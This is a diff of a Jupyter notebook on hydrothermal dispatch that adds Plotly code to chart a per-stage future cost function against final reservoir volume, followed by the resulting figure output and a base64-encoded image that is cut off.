+ " n_stages = len(operation['stage'].unique())\n",
+ " \n",
+ " fig = make_subplots(rows=n_stages, cols=1)\n",
+ "\n",
+ " i = 1\n",
+ " for stage in operation['stage'].unique():\n",
+ " stage_df = operation.loc[operation['stage'] == stage] \n",
+ " fig.add_trace(go.Scatter(x=stage_df[\"v_i\"],\n",
+ " y=stage_df['average_cost'],\n",
+ " mode='lines',\n",
+ " name=\"Stage {}\".format(i)), row=stage, col=1)\n",
+ " i+=1\n",
"\n",
- "dispatch(system=system, v_i=v_i, inflow=inflow)"
+ " fig.update_xaxes(title_text=\"Final Volume [hm3]\")\n",
+ " fig.update_yaxes(title_text=\"$/MW\")\n",
+ "\n",
+    "    fig.update_layout(height=300*n_stages, title_text=\"Future Cost Function\")\n",
+ " fig.show()"
]
},
{
"cell_type": "code",
- "execution_count": 9,
- "id": "108fdcb5-9ce2-49db-b487-eeaf90ec0e24",
- "metadata": {},
+ "execution_count": 17,
+ "id": "2b718ada-dd91-4cb6-a31c-f36b61674065",
+ "metadata": {
+ "tags": []
+ },
"outputs": [
{
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System Load: [50, 50, 50]\n",
- "Number of HGUs: 1\n",
- "Number of TGUs: 2\n"
- ]
+ "data": {
+          "application/vnd.plotly.v1+json": "[Plotly figure output elided: 'Future Cost Function' -- three stacked line subplots ('Stage 1' to 'Stage 3'), x-axis 'Final Volume [hm3]', y-axis '$/MW'; average cost at volumes 20/60/100: Stage 1 (6725, 7.75, 0), Stage 2 (11787.5, 226.93, 0.62), Stage 3 (15425, 576.31, 161.68)]",
+ "image/png": "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